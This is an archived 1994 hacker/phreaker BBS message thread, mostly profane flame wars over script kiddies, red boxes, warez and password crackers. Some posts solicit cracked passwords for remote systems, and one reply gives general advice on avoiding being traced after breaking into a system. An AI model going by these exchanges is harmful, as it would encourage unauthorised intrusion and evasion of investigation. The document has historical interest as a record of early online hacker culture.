May 25 01:53:33 1994 From: uufnord@yabbs To: all@yabbs Subject: re: LoCaLiTy... Date: Wed May 25 01:53:33 1994 ... and then he said 'Dickhead Asshole Cocksucker' and I don't know what he meant by it. From feotus@yabbs Wed May 25 17:16:06 1994 From: feotus@yabbs To: cosmos@yabbs Subject: oh brodder Date: Wed May 25 17:16:06 1994 your getting slow old man amazing that someone as hard-core from the eighties as you would waste their time ona bbs liek this? Why arent you coding you little hacker gawd you. it's your time your wasting when you flame me for this one. it won't bother me. From Badger01@yabbs Thu May 26 16:02:08 1994 From: Badger01@yabbs To: feotus@yabbs Subject: re: oh brodder Date: Thu May 26 16:02:08 1994 This is not a flame. Just saying hello. People are so interesting, dontchathink? And I am damn near computre illeterarte so feel free to flame me, cosmos BADGER01 Matthew Rossi 'These hands won many a torque of gold." THE MADNESS OF KING GOLL From Natalie@yabbs Thu May 26 18:50:57 1994 From: Natalie@yabbs To: Badger01@yabbs Subject: re: oh brodder Date: Thu May 26 18:50:57 1994 *waits* From cannibal@yabbs Fri May 27 08:57:02 1994 From: cannibal@yabbs To: all@yabbs Subject: h/p mail net Date: Fri May 27 08:57:02 1994 Hiya all. We in an overseas top bbs with a serious and active H/P/A conference, are looking for a serious H/P mail net (or a net with a large hacking section/folder) to be subscribed to as a site. We are able to support any mail net that will be approved with international quality mail and files. For further info, email me on this board. -=[Cannibal]=- From cosmos@yabbs Fri May 27 17:51:23 1994 From: cosmos@yabbs To: cannibal@yabbs Subject: re: h/p mail net Date: Fri May 27 17:51:23 1994 In message h/p mail net, cannibal talked shit: > Hiya all. > We in an overseas top bbs with a serious and active H/P/A conference, > are looking for a serious H/P mail net (or a net with a large hacking > section/folder) to be subscribed to as a site. We are able to support > any mail net that will be approved with international quality mail > and files. > Yeah, spare us. Cosmos From cannibal@yabbs Fri May 27 18:56:21 1994 From: cannibal@yabbs To: cosmos@yabbs Subject: re: h/p mail net Date: Fri May 27 18:56:21 1994 > Yeah, spare us. Fuck, i just talked to you and now i see this msg.. 'vrybody : cosmos is a real softie in real life (in (t)alk anywayz ;).. how much time it takes ya to fake that cynicism? I really should invite the 2600 con to come by your house once.. wouldn't hurt them to get some shit.. cannieo. From Gnarr@yabbs Sat May 28 10:56:54 1994 From: Gnarr@yabbs To: all@yabbs Subject: Date: Sat May 28 10:56:54 1994 Jeez...........teh things you miss when your gone for a while..................... From nirvana@yabbs Sat May 28 13:43:51 1994 From: nirvana@yabbs To: all@yabbs Subject: Replacement for hack-this Date: Sat May 28 13:43:51 1994 Dear esteemed collegues, ( wow , i can hardly wait for cosmos' flame on this ) It seems that hack-this is closed for this summer . Can my esteemed friends suggest an alternative site for this ? Before this gets censored , i would like to point out that i am not asking for a site name for a particular activity , but only a replacement for hack-this . I hope htoaster realizes the subtle but important difference between these two points . Thanking u in advance . Regards to all , Nirvana From the Land of Miss Universe '94. From pnovak@yabbs Sat May 28 16:25:17 1994 From: pnovak@yabbs To: all@yabbs Subject: cosmos Date: Sat May 28 16:25:17 1994 Soft at heart??? pnovak has been preparing some lodestone-tipped arrows to fire at his hd's. Thought he deserved something like that... (from the jungles of the amazon, lotsa xt's here...) From taegu@yabbs Mon May 30 05:41:41 1994 From: taegu@yabbs To: all@yabbs Subject: re: rexd hole? Date: Mon May 30 05:41:41 1994 From uufnord@yabbs Tue May 31 01:11:39 1994 From: uufnord@yabbs To: taegu@yabbs Subject: re: rexd hole? Date: Tue May 31 01:11:39 1994 From taegu@yabbs Tue May 31 17:54:14 1994 From: taegu@yabbs To: uufnord@yabbs Subject: re: rexd hole? Date: Tue May 31 17:54:14 1994 that message was sent in error sorry for the confusion From Dprogram@yabbs Tue May 31 21:56:20 1994 From: Dprogram@yabbs To: scudder@yabbs Subject: re: LoCaLiTy... Date: Tue May 31 21:56:20 1994 Don't get so concerned, scudder. Cosmos is a dipshit and speaks for himself alone. All he does is sit on his ass and pull his eliter-then-thou altitude. He apparently has no life, and if he got one then perhaps we could get something done around here, but until that happens, I beleive the best thing to do is ignore him. Say, cosmos: I thought you said you used your red box daily, and now red boxers are lame? I myself have used codez in the pastand I see red boxing as an improvement. And your article on packet switched networks was worthless. Oh, scuze me, if I want you to tell me anything then I want everything on a silver platter. Well, don't worry cosmo, I wouldn't ask for a drink of water if I was dying of thirst. Could you actually be as pathetic as you seem? From cosmos@yabbs Wed Jun 1 01:27:05 1994 From: cosmos@yabbs To: Dprogram@yabbs Subject: re: LoCaLiTy... Date: Wed Jun 1 01:27:05 1994 In message re: LoCaLiTy..., Dprogram spouted garbage, saying: > Don't get so concerned, scudder. Cosmos is a dipshit and speaks for > himself alone. All he does is sit on his ass and pull his eliter-then-thou > altitude. He apparently has no life, and if he got one then perhaps we > could get something done around here, but until that happens, I beleive > the best thing to do is ignore him. And just what do you want to accomplish?? Let me guess, haqin and phreakin shit....sorry m8, back to your hole. > > Say, cosmos: I thought you said you used your red box daily, and now red > boxers are lame? I myself have used codez in the pastand I see red boxing > as an improvement. And your article on packet switched networks was > worthless. Oh, scuze me, if I want you to tell me anything then I want > everything on a silver platter. Well, don't worry cosmo, I wouldn't > ask for a drink of water if I was dying of thirst. Could you actually be > as pathetic as you seem? Um, I dont have a redbox...but Ill run on out and make one right away. Worthless as in, you probably couldnt understand it. Anyhow, you fit the bill...if it's not a HOW-TO then its not good. Thats why Karl Strickland keeps you guys in business, an 8lgm script does it all and you dont have to know a damn thing. Anyhow, you just run along now m8. Cosmos From DrClaw@yabbs Wed Jun 1 11:18:04 1994 From: DrClaw@yabbs To: cosmos@yabbs Subject: what an asshole Date: Wed Jun 1 11:18:04 1994 oh look at me...i want to be a lamer like cosmos. Oh iam so cool cause i can just flame anything. Oh bow down before me you unholy people.. get a life asshole From cosmos@yabbs Wed Jun 1 14:46:29 1994 From: cosmos@yabbs To: DrClaw@yabbs Subject: re: what an asshole Date: Wed Jun 1 14:46:29 1994 In message what an asshole, DrClaw said: > oh look at me...i want to be a lamer like cosmos. Oh > iam so cool cause i can just flame anything. Oh bow down > before me you unholy people.. You forgot to mention, "I am a |<-RaD motherfucker." > > get a life asshole Hmmmm....perhaps by haqin 3l33t systems and using my redbox. Cosmos From buzzbomb@yabbs Wed Jun 1 17:39:06 1994 From: buzzbomb@yabbs To: cosmos@yabbs Subject: re: what an asshole Date: Wed Jun 1 17:39:06 1994 so is this a flame base or a hack base? start postin' some codezzzzzz d00dzzzz, and like i'll tell ya where the warezzzzzzz g00diezzzzz are! blah whatever. ppl suck. From ButtrBoy@yabbs Wed Jun 1 17:40:04 1994 From: ButtrBoy@yabbs To: all@yabbs Subject: re: what an asshole Date: Wed Jun 1 17:40:04 1994 hahahaha! HooBoy you guys are a riot. I think mebbe you guys don't give Cos enough credit, the ornery old bastard. He knows plenty about OSs, unix specifically...been around long enough, i guess. Cos--you heard about plan 9? know anything about it? I got a redbox, i admit, but it's nothing special, really. Just use it to call my girlfriend while she's away :'( I give a lot more credit to people who know x25 networks and pbx's and are serious about learning how systems work. I just got my account restored after my sysadmins discovered a cracked passwd file and ypx and satan and (yep, cos, you guessed it) 8lgm and bugtraq scripts and nuke etc. They also discovered it was 30 megs larger than it was sposed to be. So no more toolin' around for me, imma learn UNIX the hard way and set up a box myself, mebbe SLIPed in, running NetBSD, instead of trying to glean shit from the tons of scripts and crap people dcc or mail me. It's funny, when you think about it, how much you can do without really understanding how it works. SMTP, fer example. Hell, any protocol, really. That's why i think all hackers should try to read as many rfc's as they can, instead of running programs other people wrote or following instructions other people give. That's not hacking. That's not learning. That's just leeching. anyhowz, my $.02. -=ButterBoy=- From cosmos@yabbs Wed Jun 1 22:30:55 1994 From: cosmos@yabbs To: ButtrBoy@yabbs Subject: re: what an asshole Date: Wed Jun 1 22:30:55 1994 On the right track my friend. Codez kiddies just don't seem to understand that those scripts had to come from somewhere. Hacking has fizzled down to kids running scripts, red box antics, and collectin mags to show off at a 2600 meet. Gone are the inquisitive natures collected behind systems hacking. And another thing, since when did hacking become collecting cracked accounts...pffft. Cosmos From uufnord@yabbs Thu Jun 2 03:07:24 1994 From: uufnord@yabbs To: cosmos@yabbs Subject: re: what an arsehole Date: Thu Jun 2 03:07:24 1994 Scripts had to come from somewhere? Really? I thought they were automagically generated from the emissions of pulsar X9 and then stegan-o-fucked into the pictures of naked babees in Penthouse, scanned, decoded, and transcribed, and then placed on Usenet. Maybe I don't have a clue. Maybe all that I thought was actually a delusion and nothing exists except my mind imagining all these things. Nah.. I got a penthouse to read. From Jeremiah@yabbs Sat Jun 4 01:02:38 1994 From: Jeremiah@yabbs To: cosmos@yabbs Subject: shit you'll find... Date: Sat Jun 4 01:02:38 1994 Believe it or not I found 2 or 3 scripts on some localz around here... I know I'm not the cool guy hacker, but doesn't that defeat the point of hacking if someone wrote the damn script and you just run it???? From cosmos@yabbs Sat Jun 4 01:37:35 1994 From: cosmos@yabbs To: Jeremiah@yabbs Subject: re: shit you'll find... Date: Sat Jun 4 01:37:35 1994 In message shit you'll find..., Jeremiah said: > Believe it or not I found 2 or 3 scripts on some localz around here... > I know I'm not the cool guy hacker, but doesn't that defeat the point of > hacking if someone wrote the damn script and you just run it???? Hacking, yes. Cracking, no. If all you want to do is break into a system grab root and do whatever, a couple of scripts can be a handy tool. Cosmos From slohack@yabbs Sat Jun 4 16:23:50 1994 From: slohack@yabbs To: all@yabbs Subject: anybody seen this? Date: Sat Jun 4 16:23:50 1994 Anybody ever heard of a PACKIT/6 System? It is some kind of software interface for a ISDN net. I found one at a University on there net. It seems to have all sorts of setup shit for their ISDN lines. Kinda cool, but some of the stuff needs a pwd. Anybody got an sources/manuals/info on it? tHANKS.... Latez.... SLOHACK From scudder@yabbs Sat Jun 4 21:00:19 1994 From: scudder@yabbs To: all@yabbs Subject: info request.. Date: Sat Jun 4 21:00:19 1994 Greetings all, (go ahead and flame me cosmos) Has anyone heard of a model PR25A Conductor Tagger & Analyzer? It's made by Perkins Research & Manufacturing Co. Inc. and I found a manual for one in my local Bell office's dumpster and as far as I can tell it involves tagging, simplexing, and monitoring....Whoever has more info lemme know Thanx. From elixirio@yabbs Tue Jun 7 08:51:28 1994 From: elixirio@yabbs To: all@yabbs Subject: help Date: Tue Jun 7 08:51:28 1994 Is there anybody out there who has Cracker Jack or something like that (UNIX/VMS passwd cracker) ? If you do please send it to !! If you don't contact me also for exanging hacking infos and progs. P.S. I am also searching for for ftp sites with hacking stuff. From buzzbomb@yabbs Tue Jun 7 10:10:33 1994 From: buzzbomb@yabbs To: cosmos@yabbs Subject: re: shit you'll find... Date: Tue Jun 7 10:10:33 1994 they couild come in handy for hacking too... not running them, but reading them and analyzing them to see how they work. i've never seen these scripts you're talking about (i'd like to check them out if anyne can point me to them) but i'm sure a person could learn from them if they took the time to try. From cosmos@yabbs Tue Jun 7 13:57:56 1994 From: cosmos@yabbs To: elixirio@yabbs Subject: re: help Date: Tue Jun 7 13:57:56 1994 In message help, elixirio said: > Is there anybody out there who has Cracker Jack or something like > that (UNIX/VMS passwd cracker) ? Wonderful, more wankers online. Try archie and FTP you stupid fuck. > If you do please send it to !! How about a nice big core? > If you don't contact me also for exanging hacking infos and progs. > P.S. I am also searching for for ftp sites with hacking stuff. You my friend couldn't hack your way out of a paper bag. wankers. Cosmos From cosmos@yabbs Tue Jun 7 13:59:33 1994 From: cosmos@yabbs To: buzzbomb@yabbs Subject: re: shit you'll find... Date: Tue Jun 7 13:59:33 1994 In message re: shit you'll find..., buzzbomb said: > they couild come in handy for hacking too... not running them, but > reading them and analyzing them to see how they work. i've never seen > these scripts you're talking about (i'd like to check them out if > anyne can point me to them) but i'm sure a person could learn from > them if they took the time to try. Yes, one could. They are quite good. Read on usenet, that is where they are posted regularly. Or drop me a request at: and Ill email them to ya. Cosmos From cosmos@yabbs Wed Jun 8 03:00:36 1994 From: cosmos@yabbs To: Markus@yabbs Subject: re: shit you'll find... Date: Wed Jun 8 03:00:36 1994 In message re: shit you'll find..., Markus said: > Really, this is not for CoSMoS, but the fer the person who posted about > Cracker Jack. I could give it to ya. I'd also like a list of the > passwords when they're cracked and the address of the system they're on. This is too lame, it can't be true. A blatant plug for cracked passwords on a public BBS...can't get any more 3l33t than that m8's.... Alex will delete this as soon as he sees it, I am still laughing now... > > OBeLiX > [WRiTeR FoR PhP] PhP must be pretty desperate for membership if all they can get is complete wankers who beg for cracked passwords. Then again, 99.9% of all groups are a bunch of pathetic arses who form a collective group of wankers. Still amused... Cosmos From Kashmir@yabbs Fri Jun 10 15:07:03 1994 From: Kashmir@yabbs To: ButtrBoy@yabbs Subject: re: what an asshole Date: Fri Jun 10 15:07:03 1994 Where'd you get satan? I thought it was still being made.. From buzzbomb@yabbs Fri Jun 10 23:58:02 1994 From: buzzbomb@yabbs To: cosmos@yabbs Subject: re: shit you'll find... Date: Fri Jun 10 23:58:02 1994 oh yeah.... you're on "coz". sure. and they post them on wow.... sure. c00l sarc@zm d00d!!! From cosmos@yabbs Sat Jun 11 00:16:38 1994 From: cosmos@yabbs To: buzzbomb@yabbs Subject: re: shit you'll find... Date: Sat Jun 11 00:16:38 1994 In message re: shit you'll find..., buzzbomb said: > oh yeah.... you're on "coz". sure. No, but I have a mail forwarder there. > > and they post them on wow.... sure. > If you are referring to the 8lgm advisories, yes they do. Perhaps if you got your head out of your pathetic ass and checked it out you might not be such a clueless little fuck. > c00l sarc@zm d00d!!! You aint seen nothing yet m8. Cosmos From Zbadba@yabbs Sat Jun 11 01:36:22 1994 From: Zbadba@yabbs To: cosmos@yabbs Subject: mail forwarder Date: Sat Jun 11 01:36:22 1994 Any chance I might nab that forwarder? I've got a couple of accounts on grex, and it'd be nice to have them all sent to one convenient location. From rattler@yabbs Sat Jun 11 11:26:21 1994 From: rattler@yabbs To: all@yabbs Subject: help Date: Sat Jun 11 11:26:21 1994 anybody know anythinh about a FLEXIM someorsuch system ? just happened to call one by accident. From feotus@yabbs Sat Jun 11 17:07:49 1994 From: feotus@yabbs To: Zbadba@yabbs Subject: re: mail forwarder Date: Sat Jun 11 17:07:49 1994 couple accounts? fucker why waste good resources provided to the public like that. I could kill ya. geesh one is enough, it's not like their draconian in their policy or anything. get a clue man, dont waste the time and energy of poeple who are ot to help. From PhE@yabbs Sat Jun 11 17:27:30 1994 From: PhE@yabbs To: all@yabbs Subject: Read Date: Sat Jun 11 17:27:30 1994 Ionic Destruction (215).722.0570 SysOp-Phatal Error CoS-Anonymous Caller NUP: ROOM 246 H/P/A/V/C/T No ]<-RaD Warez UsRobotics 16.8 Dual Standard MoRGUE Textz World Headquarters Legend Virii Eastern Headquarters F.U.C.K. Text East Headquarters Satanic Sinners Service Distribution CorrupTed Trojan Developments Distribution 2400/9600/14400/16800 v42/v32/v32bis From cosmos@yabbs Sat Jun 11 18:06:42 1994 From: cosmos@yabbs To: Zbadba@yabbs Subject: re: mail forwarder Date: Sat Jun 11 18:06:42 1994 In message mail forwarder, Zbadba said: > Any chance I might nab that forwarder? > I've got a couple of accounts on grex, and it'd be nice to have them all > sent to one convenient location. try placing a .forward file in your home directory.... Cosmos From cosmos@yabbs Sat Jun 11 18:11:39 1994 From: cosmos@yabbs To: PhE@yabbs Subject: re: Read Date: Sat Jun 11 18:11:39 1994 In message Read, PhE said: > > > > > No ]<-RaD Warez > ^^^^^^^^^^^^^^^ > UsRobotics 16.8 Dual Standard > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Hmmmm...what single occurence singles out a WaReZ board... > MoRGUE Textz World Headquarters > > Legend Virii Eastern Headquarters > > F.U.C.K. Text East Headquarters > > Satanic Sinners Service Distribution > > CorrupTed Trojan Developments Distribution > God, I am impressed. Nothing like good ole holsum reading to get the spirits up. This character is just too 3l33t for me. B0aRdZ r lAm3 d00d, Int3Rn3tz 3l33t!!! Cosmos From Zbadba@yabbs Sat Jun 11 22:04:57 1994 From: Zbadba@yabbs To: feotus@yabbs Subject: re: mail forwarder Date: Sat Jun 11 22:04:57 1994 I do nothing with that system but use it as a convenient mailing point. I don't store any files, recieve usenet or any such nonsense. However, I have the need for two accounts, one in my real name (that I can use for professional contacts) and one with my handle (for personal contacts). As of right now, I've set my mail to be forwarded to my home system. All this means that I never actually log on anymore. MY two accounts are currently using fewer resources than one active account there. Frankly, feo, I think you've prejudged me. That's really a bad habit to get into, but then, I've sensed a recurring pattern in that area with you. (Translation: Chill out. I've no qualms with you, and I'd rather not start a flame war.) From Zbadba@yabbs Sat Jun 11 22:07:27 1994 From: Zbadba@yabbs To: cosmos@yabbs Subject: re: mail forwarder Date: Sat Jun 11 22:07:27 1994 >try placing a .forward file in your home directory.... I feel sheepish. Pity me, I still have to deal with DOS, and I'm used to the DOS way of doing things (i.e. kludge programming to make up for the shitty OS deficiencies). Relatively, I'm a UNIX newbie. From feotus@yabbs Sun Jun 12 12:50:49 1994 From: feotus@yabbs To: Zbadba@yabbs Subject: re: mail forwarder Date: Sun Jun 12 12:50:49 1994 no problem, but I have seen a TON of lamers from other areas use cyberspace as a junk yard and basically abuse it. And I think you'll agree after hangig out here for awhile that when you see someone say "i have several accounts oin such and such" that chances are they are some wanker abusing free shit. I have one there myself for professional and handle contacts, but my real name isnt used. Nice system, and some lamers actually tried to crack it with some *LGM scripts, too bad it has all the scripted holes patched, those guys are the epitome of asswipe trying to crack a sysem providing services, and operating as TAZ on the net. that's like biting your own heel. From Justbob@yabbs Mon Jun 20 15:39:28 1994 From: Justbob@yabbs To: all@yabbs Subject: Date: Mon Jun 20 15:39:28 1994 woo wooo, pub unix! where to i sign up?! (hey binkley, shouldv'e known i'd find you here:) From mad-mind@yabbs Thu Jun 23 06:31:13 1994 From: mad-mind@yabbs To: PhE@yabbs Subject: BBS Date: Thu Jun 23 06:31:13 1994 Your system has an interesting logon screen. From Kamakize@yabbs Sat Jun 25 19:40:26 1994 From: Kamakize@yabbs To: cosmos@yabbs Subject: re: Delphi Date: Sat Jun 25 19:40:26 1994 Well i have had my Delphi account for a LONG time before they had Internet, and you used to could Bonce from city to city (they ahd Boston,NYC,LA,and Argentia Delphi) it was cool. then intenet came and its starting to suck, only reason i kep delphi is cuz parentsz pay for it he From Kamakize@yabbs Sat Jun 25 19:44:33 1994 From: Kamakize@yabbs To: cosmos@yabbs Subject: re: LoCaLiTy... Date: Sat Jun 25 19:44:33 1994 Yah i go to the dc-2600 meetings about 4-5 tiks a year (hey it is a 3 hour drive) but there are warez kiddies and a guy trying to sell a red box for 100$ alot. hehhe but we do have fun taking pcitures of the infamous Mall Secuirty guys. i have pictures will bring them to DC 2600 if i remember he gawdf its so fucking funny how thye do it. and that camera my gawd its so funny.. i cant help from laughing. but dc 2600 is cool in ways accualy talk goes on. EFF showes up sometimes im just wating for the BUST #2 to come. or news to slam into there again... From GPF@yabbs Sat Jun 25 20:19:44 1994 From: GPF@yabbs To: Kamakize@yabbs Subject: re: LoCaLiTy... Date: Sat Jun 25 20:19:44 1994 what fucking language are you speaking dude? From cosmos@yabbs Sat Jun 25 23:43:15 1994 From: cosmos@yabbs To: Kamakize@yabbs Subject: re: Delphi Date: Sat Jun 25 23:43:15 1994 In message re: Delphi, Kamakize said: > Well i have had my Delphi account for a LONG time before they > had Internet, and you used to could Bonce from city to city (they ahd > Boston,NYC,LA,and Argentia Delphi) it was cool. then intenet came > and its starting to suck, only reason i kep delphi is cuz parentsz pay for > it > he Oh christ..... D3Lp|-|| |Z 3l33T Cosmos From Egwene@yabbs Mon Jun 27 05:34:18 1994 From: Egwene@yabbs To: all@yabbs Subject: KOH Date: Mon Jun 27 05:34:18 1994 How do I get KOH from It says if you are in the U.S. you can get it but then it says access denied. Does anyone know of another source I can get it at. Egwene From cosmos@yabbs Tue Jun 28 00:05:13 1994 From: cosmos@yabbs To: Egwene@yabbs Subject: re: KOH Date: Tue Jun 28 00:05:13 1994 In message KOH, Egwene said: > How do I get KOH from > It says if you are in the U.S. you can get it but then it says access > denied. Does anyone know of another source I can get it at. > Egwene i have no fucking clue as to what KOH is, but it smells like \/\/aR3Z to me.... Cosmos From Dim@yabbs Tue Jun 28 01:45:34 1994 From: Dim@yabbs To: all@yabbs Subject: tracing Date: Tue Jun 28 01:45:34 1994 How difficult is it to trace through someone thru the net that doesn't have an account? Say you have access through a dial up, but it's anonymous, and you can telnet out. Fake email couldn't be traced back to you, only to your host? If an admin saw a little hacking goin on in his system, and traced the caller, would he be stopped at the dial-up? If anyone wants to help me out here, or flame me (cosmos), feel free... From cosmos@yabbs Tue Jun 28 02:19:55 1994 From: cosmos@yabbs To: Dim@yabbs Subject: re: tracing Date: Tue Jun 28 02:19:55 1994 In message tracing, Dim said: > How difficult is it to trace through someone thru the net that doesn't > have an account? Say you have access through a dial up, but it's > anonymous, and you can telnet out. Fake email couldn't be traced back to > you, only to your host? If an admin saw a little hacking goin on in his > system, and traced the caller, would he be stopped at the dial-up? If > anyone wants to help me out here, or flame me (cosmos), feel free... So one wants to cause a little trouble eh.... Fake email will be easily traced to your host unless you know your SMTP and I doubt you do. No problem though, figuring its not your account anyhow what do you care. An admin cant trace you unless they have caller id which is easily stopped on your end... He cant access a trace like bellcore or anything, to get one he would have to go through all sorts of legal channels etc... Now if he went to the authorities and showed them evidence of break in and was persistant enough they could eventually pull out telco logs of who had called the system at the given time...putting that against system logs could reveal you. Anyhow, sounds pretty lame to me. But if you want to waste your time with spoofed mail suit yourself. I doubt any admin will bother to track you down though. They will just shut down the account in question. Cosmos From Egwene@yabbs Tue Jun 28 09:29:40 1994 From: Egwene@yabbs To: cosmos@yabbs Subject: re: KOH Date: Tue Jun 28 09:29:40 1994 Never mind, I figured it out, its just a new virus. From balistic@yabbs Wed Jun 29 18:13:05 1994 From: balistic@yabbs To: all@yabbs Subject: *ulp* Help! Date: Wed Jun 29 18:13:05 1994 Recently, while online, my crt suddenly went blank and my PC started to reset itself repeatedly, has this happened to anyone else? is it a virus or a glitch in my hardware? any input would be appreciated BALISTIC From Xela@yabbs Thu Jun 30 00:04:02 1994 From: Xela@yabbs To: balistic@yabbs Subject: hmm.. Date: Thu Jun 30 00:04:02 1994 before you start looking for viruses or hardware problems, look at all your connections: wires, board connections, etc. Seems obvious, but sometimes people forget... From balistic@yabbs Thu Jun 30 15:02:33 1994 From: balistic@yabbs To: Xela@yabbs Subject: thanx Date: Thu Jun 30 15:02:33 1994 Thanx Xela, every little bit of advice helps, re-thanx From cable@yabbs Fri Jul 1 13:26:27 1994 From: cable@yabbs To: all@yabbs Subject: stacker 4.0 Date: Fri Jul 1 13:26:27 1994 hey,i have a problem with stacker 4.0, it will not load because the stacvol.dsk if "too fragmented" to mount it tells me to do a "/f" but i do not know where so i have done it everywhere and nothing. i have no manual so i need help to defrag the drive so i can mount it. thannkz a lot my -mail address is thanx a lot From PyR0@yabbs Fri Jul 1 16:03:23 1994 From: PyR0@yabbs To: all@yabbs Subject: Where is the 0 dayz Date: Fri Jul 1 16:03:23 1994 Where are the 0 day warez on this board?? Can anyone tell me any c00l sites with warez??? Or any bbs around that carry warez for dos/windows and games tnx d00dz From slohack@yabbs Fri Jul 1 16:49:32 1994 From: slohack@yabbs To: PyR0@yabbs Subject: re: Where is the 0 dayz Date: Fri Jul 1 16:49:32 1994 I not even going to say anything.....:) From Jeremiah@yabbs Fri Jul 1 17:50:18 1994 From: Jeremiah@yabbs To: PyR0@yabbs Subject: Wait till Cosmos sees this. Date: Fri Jul 1 17:50:18 1994 Uh.... Since when does :<-Rad \\//\\//ar3z have anything to do with hacking? Tsk. Tsk. Didn't they ever tell you that pirating sofware is a no-no... I work for the SPA and I have already checked your E-Mail address, and I know where you live. You will cease all pirating and delete EVERY illegitimate copy of any program ever made. I will send you E-Mail regarding your crimes. From Jeremiah@yabbs Fri Jul 1 17:55:30 1994 From: Jeremiah@yabbs To: all@yabbs Subject: anyway.... Date: Fri Jul 1 17:55:30 1994 I like acting... I'm not in a creative mood though... "HEY D00DZ I NeeD SoMe \/\/ar3z. Thanx C00L D00D! :_ame From Jeremiah@yabbs Fri Jul 1 18:00:22 1994 From: Jeremiah@yabbs To: all@yabbs Subject: Sunsite? Date: Fri Jul 1 18:00:22 1994 I tried jumping onto sunsite and it said that it was temporaily down due to "Childish Hacking"... Anyone know any details? From dmonger@yabbs Fri Jul 1 20:06:38 1994 From: dmonger@yabbs To: PyR0@yabbs Subject: re: Where is the 0 dayz Date: Fri Jul 1 20:06:38 1994 haa haa haa hoo hoo hoo hee hee hee stop, i'll pee -peter From cosmos@yabbs Sat Jul 2 00:19:48 1994 From: cosmos@yabbs To: Jeremiah@yabbs Subject: re: Sunsite? Date: Sat Jul 2 00:19:48 1994 In message Sunsite?, Jeremiah said: > I tried jumping onto sunsite and it said that it was temporaily down > due to "Childish Hacking"... Anyone know any details? And the crackers come out to play on linux...silly wankers using linux hack the main distribution site??? What a way to show support for the OS...course it will probably be blamed on Jesus Monroy... ;) Cosmos From Dim@yabbs Sat Jul 2 15:16:52 1994 From: Dim@yabbs To: all@yabbs Subject: re: Sunsite? Date: Sat Jul 2 15:16:52 1994 Well I was on sunsite yesterday, so they must have cleared up their hacking problems... From Jeremiah@yabbs Sat Jul 2 18:46:24 1994 From: Jeremiah@yabbs To: Dim@yabbs Subject: Aye Date: Sat Jul 2 18:46:24 1994 Yeah, no cutesy little logon message anymore.... Oh well... From Mystery@yabbs Sun Jul 3 16:46:12 1994 From: Mystery@yabbs To: all@yabbs Subject: FSP Date: Sun Jul 3 16:46:12 1994 What is FSP and how does one use it? I've heard some things about it, but haven't seen any sites where they use it... From cosmos@yabbs Sun Jul 3 18:15:49 1994 From: cosmos@yabbs To: Mystery@yabbs Subject: re: FSP Date: Sun Jul 3 18:15:49 1994 In message FSP, Mystery said: > haven't seen any sites where they use it... FSP |Z 3l33t cUz ewe g3T |<-RaD \/\/aR3Z Cosmos (basically its the ad hoc of almost any warez junkie) From dmonger@yabbs Mon Jul 4 20:38:43 1994 From: dmonger@yabbs To: cosmos@yabbs Subject: re: FSP Date: Mon Jul 4 20:38:43 1994 you can find some cool demos off it too (not that i remember where). it would be a neat idea if it wasn't such a fucking slow protocol. :) (geek joke ) -peter From Mystery@yabbs Wed Jul 6 16:26:49 1994 From: Mystery@yabbs To: cosmos@yabbs Subject: re: FSP Date: Wed Jul 6 16:26:49 1994 How does one get FSP and where are some sites where one can use it? From GPF@yabbs Wed Jul 6 19:37:59 1994 From: GPF@yabbs To: Mystery@yabbs Subject: re: FSP Date: Wed Jul 6 19:37:59 1994 i think there's a copy of fsp at you an get KrAd WaReZZZzZ at for more information.. write with the subject line saying "3y3 n33d WaR3ZzZ!!$#!$" *smirk* gpf..... From cosmos@yabbs Wed Jul 6 22:59:19 1994 From: cosmos@yabbs To: Mystery@yabbs Subject: re: FSP Date: Wed Jul 6 22:59:19 1994 In message re: FSP, Mystery said: > How does one get FSP and where are some sites where one can use it? > Look up sarcasm. Then use a large caliber handgun at close range. Cosmos From Mystery@yabbs Fri Jul 8 00:03:21 1994 From: Mystery@yabbs To: GPF@yabbs Subject: re: FSP Date: Fri Jul 8 00:03:21 1994 Yeah... I bet... You'd really post a site with pirate stuff to someone you don't even know? Get real... From cosmos@yabbs Fri Jul 8 00:41:05 1994 From: cosmos@yabbs To: Mystery@yabbs Subject: re: FSP Date: Fri Jul 8 00:41:05 1994 In message re: FSP, Mystery said: > Yeah... I bet... You'd really post a site with pirate stuff to someone > you don't even know? Get real... > Fuck off wanker. Sarcasm, learn it. Cosmos From Mystery@yabbs Fri Jul 8 17:38:53 1994 From: Mystery@yabbs To: cosmos@yabbs Subject: re: FSP Date: Fri Jul 8 17:38:53 1994 Hey, I was just writing a message trying to find out some stuff... Why don't you take your proabably miniscule little dick and shove it up your own ass... I was asking for some public, legal FSP places... I was NOT asking for some Pirate/Warez place.. Hell for all you know I could be some cop or something... I know sarcasm, but I just thought that the users on here would be a little more courteous when it came to helping someone else on things... I guess I was wrong... Go crawl into a dark cave and rot like the CRAP you are writing... Now that that little flame is over, any out there that can honestly help me? From rattler@yabbs Fri Jul 8 17:48:10 1994 From: rattler@yabbs To: Mystery@yabbs Subject: re: FSP Date: Fri Jul 8 17:48:10 1994 thank you. you saved my day. i thought this was all gonna be moody, gloomy, dead dank boring. but no, my angel! you YOU you came to the rescue. thankyouthankyouthankyou. From gpf_no_2@yabbs Fri Jul 8 17:53:44 1994 From: gpf_no_2@yabbs To: Mystery@yabbs Subject: re: FSP Date: Fri Jul 8 17:53:44 1994 there are few legal fsp sites for many reasons... a) the only advantages of fsp are that it is slightly harder to track that ftp and b) that it creates less load for the server... otoh, it is limited to very,very slow dtr.. (something like 1kps if i remember correctly...) so it's only really useful for 3l33t \/\/aR3Z d00dZ (hahahaha) and kiddie porn sickos... ...gpf From gpf_no_2@yabbs Fri Jul 8 17:57:16 1994 From: gpf_no_2@yabbs To: rattler@yabbs Subject: re: FSP Date: Fri Jul 8 17:57:16 1994 what the fuck? followups to the poetry base... sheesh From Justbob@yabbs Fri Jul 8 19:29:38 1994 From: Justbob@yabbs To: gpf_no_2@yabbs Subject: re: FSP Date: Fri Jul 8 19:29:38 1994 Don't forget I suppose that's a pretty damn big fsp site. But again, why ould you want to use fsp...unless of course you couldn't get in on ftp... From Delmar@yabbs Sat Jul 9 11:50:32 1994 From: Delmar@yabbs To: PyR0@yabbs Subject: re: Where is the 0 dayz Date: Sat Jul 9 11:50:32 1994 My god. Is this how all internet HP sites are? This seems more ... childish? I thought this was an H/P base.... From Jeremiah@yabbs Sat Jul 9 12:13:55 1994 From: Jeremiah@yabbs To: cosmos@yabbs Subject: Phrack-44 Date: Sat Jul 9 12:13:55 1994 Was that your artical in Phrack-44 or was it someone with the same handle as you? Just curious... From Natalie@yabbs Sat Jul 9 16:53:20 1994 From: Natalie@yabbs To: Delmar@yabbs Subject: re: Where is the 0 dayz 